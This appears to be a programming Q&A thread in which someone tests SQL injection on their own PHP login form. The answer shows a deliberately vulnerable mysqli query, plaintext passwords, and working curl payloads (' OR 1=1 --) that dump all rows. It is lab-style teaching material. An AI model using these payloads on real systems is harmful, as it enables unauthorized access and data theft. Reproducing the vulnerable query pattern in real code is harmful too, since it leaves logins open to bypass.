# SQL Injection not working on code which is vulnerable to it

Tags: php, sql, sql-injection

I'm trying to bypass a login form by using SQL injection (it is my own form by the way).

But the techniques I've tried just return my error message 'invalid login credentials'

Can anybody tell me what i can do?

```
$email = $_POST['email'];

$password = $_POST['password'];

$query = mysqli_query ($db, "SELECT * FROM clients WHERE email = '$email' AND password = '$password'");
```

I have tried adding `'or TRUE--` into the email field which from as far as I'm aware should end the query after the --

I have tried many other examples from:

> http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html

But none work.

I understand on the examples in the link it does not use `mysqli` but why would this effect it so much?

Comment: You're missing a space between `'` and `or`.

Comment: That doesn't change it, I still just get the invalid message

Comment: Try it in the password instead of email. And since its the last in the where clause, you don't need the `--`.

Comment: No that doesn't work either

Answer (score 0):

Given the following table structure

```
CREATE TABLE `clients` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `email` varchar(100) NOT NULL,
  `password` varbinary(100) NOT NULL,
  `secretData` varchar(20) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=latin1
```

With the following data in it

```
INSERT INTO `clients` (`email`,`password`) 
VALUES 
("bob@gmail.com","aadsf345"), ("mark@aol.com","536734sdgf"), 
("mary@outlook.com","password123"), ("anna@mail.ru","{}!@#$>,ZX");
```

And your vulnerable php code that would select an user based on his/hers email and password combination and display the string in the `secretData` column

```
$db = new mysqli("localhost", "root", "", "test");

$email = $_POST['email'];
$pass = $_POST['password'];

$sql = "SELECT * FROM clients WHERE email = '$email' AND password = '$pass'";

if ($result = $db->query($sql)) { 
    while($obj = $result->fetch_object()){ 
        print $obj->secretData . PHP_EOL;
    } 
}
else{
    print "no result";
}
```

A successful login would be as follows, displaying bob's secret data

```
$ curl -d 'email=bob@gmail.com&password=aadsf345' http://localhost.com
aaaaa
```

While a successful injection would be as follows, display everybody's secret data

```
$ curl -d 'email=bob@gmail.com&password=aads%27+OR+1=1+--+' http://localhost.com
aaaaa
bbbbb
ccccc
ddddd
```

If you were to print out the injected query, our injection starts at the marker, with the `%27` which is a single quote.

```
SELECT * FROM clients WHERE email = 'bob@gmail.com' AND password = 'aads' OR 1=1 -- '
                                                                        ^
```

Using `OR TRUE` works as well

```
curl -d 'email=bob@gmail.com&password=aads%27+OR+TRUE+--+' http://localhost.com
```